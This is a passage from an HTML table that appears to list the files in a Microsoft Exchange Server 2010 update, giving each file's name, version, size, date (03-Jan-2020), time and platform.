14.3.470.0</td><td>74,376</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>14.3.470.0</td><td>65,224</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.dll</td><td>14.3.487.0</td><td>556,752</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>14.3.470.0</td><td>859,784</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>14.3.470.0</td><td>159,944</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>14.3.470.0</td><td>29,320</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.headerconversion.dll</td><td>14.3.470.0</td><td>26,248</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>14.3.470.0</td><td>233,096</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>14.3.470.0</td><td>23,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>14.3.470.0</td><td>44,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>14.3.470.0</td><td>65,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>14.3.470.0</td><td>73,352</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>14.3.487.0</td><td>57,040</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>14.3.487.0</td><td>1,916,624</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>14.3.470.0</td><td>104,368</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>14.3.487.0</td><td>442,064</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>14.3.470.0</td><td>18,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>14.3.487.0</td><td>1,072,848</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>14.3.470.0</td><td>21,936</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.clientstrings.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.lad.dll</td><td>14.3.470.0</td><td>123,528</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.prompts.dll</td><td>14.3.470.0</td><td>212,616</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.ucmaplatform.dll</td><td>14.3.487.0</td><td>188,112</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>14.3.487.0</td><td>765,856</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>14.3.487.0</td><td>1,384,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedmessaging.eventlog.dll</td><td>14.3.470.0</td><td>108,976</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.managementgui.dll</td><td>14.3.470.0</td><td>155,336</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Migbase.dll</td><td>14.3.470.0</td><td>783,792</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Migmsg.dll</td><td>14.3.470.0</td><td>91,560</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>16,986</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Moveallreplicas.ps1</td><td>Not applicable</td><td>13,043</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>56,868</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>28,466</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Msallog.dll</td><td>14.3.470.0</td><td>46,504</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Msexchangeadtopologyservice.exe</td><td>14.3.470.0</td><td>114,096</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Msexchangefds.exe</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangelesearchworker.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>14.3.487.0</td><td>802,512</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>14.3.470.0</td><td>27,272</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailsubmission.exe</td><td>14.3.487.0</td><td>118,480</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>14.3.470.0</td><td>48,840</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>14.3.487.0</td><td>212,688</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Msfte1.dll</td><td>14.0.7177.5001</td><td>3,228,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Msgedt.js</td><td>Not applicable</td><td>4,778</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Msglst.js</td><td>Not applicable</td><td>3,295</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>20,120</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>22,443</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>14.3.470.0</td><td>87,472</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Oabgen.dll</td><td>14.3.470.0</td><td>356,784</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ocemul.dll</td><td>8.5.3.76</td><td>54,112</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.dll</td><td>8.5.3.76</td><td>464,736</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Oilink.exe</td><td>8.5.3.76</td><td>317,280</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.jar</td><td>Not applicable</td><td>1,425,202</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oitnsf.id</td><td>Not applicable</td><td>4,688</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oit_font_metrics.db</td><td>Not applicable</td><td>375,808</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oleconverter.exe</td><td>14.3.470.0</td><td>162,736</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Oswin64.dll</td><td>8.5.3.76</td><td>103,272</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Outsidein.dll</td><td>8.5.3.76</td><td>296,296</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Owaauth.dll</td><td>14.3.470.0</td><td>104,880</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Owasl.xap</td><td>Not applicable</td><td>36,280</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Owasmime.msi</td><td>Not applicable</td><td>2,297,856</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Owaspell.dll</td><td>14.3.470.0</td><td>50,608</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Perfnm.h</td><td>Not applicable</td><td>47,627</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Perf_common_extrace.dll</td><td>14.3.470.0</td><td>170,416</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>14.3.470.0</td><td>71,600</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_mdbsz.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Policytest.exe</td><td>14.3.470.0</td><td>51,632</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>68,859</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>69,054</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Publishedstartpage.js</td><td>Not applicable</td><td>15,353</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>14.3.470.0</td><td>21,640</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Readpost.aspx</td><td>Not applicable</td><td>6,516</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readsharingmessage.ascx</td><td>Not applicable</td><td>5,235</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readvoicemailmessage.aspx</td><td>Not applicable</td><td>9,320</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redir.aspx</td><td>Not applicable</td><td>1,714</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>114,387</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reenable_auditloggingagent.ps1</td><td>Not applicable</td><td>12,395</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>20,402</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>19,447</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removereplicafrompfrecursive.ps1</td><td>Not applicable</td><td>13,887</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>13,191</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replacereplicaonpfrecursive.ps1</td><td>Not applicable</td><td>14,292</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>13,551</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>13,547</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaycrimsonevents.man</td><td>Not applicable</td><td>247,121</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>14.3.470.0</td><td>266,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>13,332</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>19,563</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetsearchindex.ps1</td><td>Not applicable</td><td>14,653</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>12,017</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>15,126</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>14.3.470.0</td><td>86,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>53,296</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Routingview.exe</td><td>14.3.470.0</td><td>167,560</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Rulesauditmsg.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Sccanno.dll</td><td>8.5.3.76</td><td>136,552</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccca.dll</td><td>8.5.3.76</td><td>46,944</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccch.dll</td><td>8.5.3.76</td><td>201,056</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccda.dll</td><td>8.5.3.76</td><td>151,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccdu.dll</td><td>8.5.3.76</td><td>617,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccex.dll</td><td>8.5.3.76</td><td>94,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfa.dll</td><td>8.5.3.76</td><td>86,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfi.dll</td><td>8.5.3.76</td><td>143,712</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfmt.dll</td><td>8.5.3.76</td><td>75,616</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfnt.dll</td><td>8.5.3.76</td><td>504,160</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfut.dll</td><td>8.5.3.76</td><td>862,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccimg.dll</td><td>8.5.3.76</td><td>426,848</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccind.dll</td><td>8.5.3.76</td><td>68,960</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Scclo.dll</td><td>8.5.3.76</td><td>162,656</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccole2.dll</td><td>8.5.3.76</td><td>30,568</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccsd.dll</td><td>8.5.3.76</td><td>43,360</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccut.dll</td><td>8.5.3.76</td><td>2,001,248</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccxt.dll</td><td>8.5.3.76</td><td>54,624</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>45,721</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Setup.com</td><td>14.3.470.0</td><td>444,928</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Setup.exe</td><td>14.3.470.0</td><td>603,568</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Smimeoptions.aspx</td><td>Not applicable</td><td>10,805</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Smimeparameterstandalone.js</td><td>Not applicable</td><td>10,566</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.h</td><td>Not applicable</td><td>1,014</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.ini</td><td>Not applicable</td><td>11,910</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.xml</td><td>Not applicable</td><td>3,439</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.h</td><td>Not applicable</td><td>739</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.ini</td><td>Not applicable</td><td>8,488</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.xml</td><td>Not applicable</td><td>2,527</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>22,566</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Startpage.aspx</td><td>Not applicable</td><td>10,891</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Startpage.js</td><td>Not applicable</td><td>177,388</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>15,837</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Store.exe</td><td>14.3.470.0</td><td>6,941,640</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>15,592</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>25,360</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>14.3.470.0</td><td>37,296</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Tokenm.dll</td><td>14.3.470.0</td><td>66,984</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Transcodingservice.exe</td><td>14.3.470.0</td><td>130,992</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>24,393</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>23,679</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>29,030</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Uglobal.js</td><td>Not applicable</td><td>984,109</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Umservice.exe</td><td>14.3.470.0</td><td>147,080</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Umworkerprocess.exe</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>12,489</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>16,662</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>24,906</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Uview.js</td><td>Not applicable</td><td>178,233</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Vlv.js</td><td>Not applicable</td><td>140,614</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Vsacad.dll</td><td>8.5.3.76</td><td>14,228,832</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsacs.dll</td><td>8.5.3.76</td><td>41,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsami.dll</td><td>8.5.3.76</td><td>74,592</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsarc.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsasf.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsbdr.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsbmp.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vscdrx.dll</td><td>8.5.3.76</td><td>22,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vscgm.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdbs.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdez.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdif.dll</td><td>8.5.3.76</td><td>25,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdrw.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdx.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdxla.dll</td><td>8.5.3.76</td><td>32,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdxlm.dll</td><td>8.5.3.76</td><td>80,224</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsemf.dll</td><td>8.5.3.76</td><td>64,864</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsen4.dll</td><td>8.5.3.76</td><td>32,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsens.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsenw.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vseps.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vseshr.dll</td><td>8.5.3.76</td><td>188,768</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsexe2.dll</td><td>8.5.3.76</td><td>53,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfax.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfcd.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfcs.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfft.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsflw.dll</td><td>8.5.3.76</td><td>154,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfwk.dll</td><td>8.5.3.76</td><td>45,920</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgdsf.dll</td><td>8.5.3.76</td><td>89,440</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgif.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsgzip.dll</td><td>8.5.3.76</td><td>37,216</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshgs.dll</td><td>8.5.3.76</td><td>50,016</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshtml.dll</td><td>8.5.3.76</td><td>517,984</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshwp.dll</td><td>8.5.3.76</td><td>91,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vshwp2.dll</td><td>8.5.3.76</td><td>111,968</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsich.dll</td><td>8.5.3.76</td><td>136,032</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsich6.dll</td><td>8.5.3.76</td><td>62,816</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsid3.dll</td><td>8.5.3.76</td><td>53,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsimg.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsindd.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsinx.dll</td><td>8.5.3.76</td><td>21,344</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwok.dll</td><td>8.5.3.76</td><td>36,704</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwok13.dll</td><td>8.5.3.76</td><td>1,409,384</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwon.dll</td><td>8.5.3.76</td><td>70,496</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwop.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsiwp.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjbg2.dll</td><td>8.5.3.76</td><td>31,584</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjp2.dll</td><td>8.5.3.76</td><td>249,184</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsjw.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsleg.dll</td><td>8.5.3.76</td><td>41,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vslwp7.dll</td><td>8.5.3.76</td><td>360,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vslzh.dll</td><td>8.5.3.76</td><td>41,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsm11.dll</td><td>8.5.3.76</td><td>28,512</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmanu.dll</td><td>8.5.3.76</td><td>40,288</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsmbox.dll</td><td>8.5.3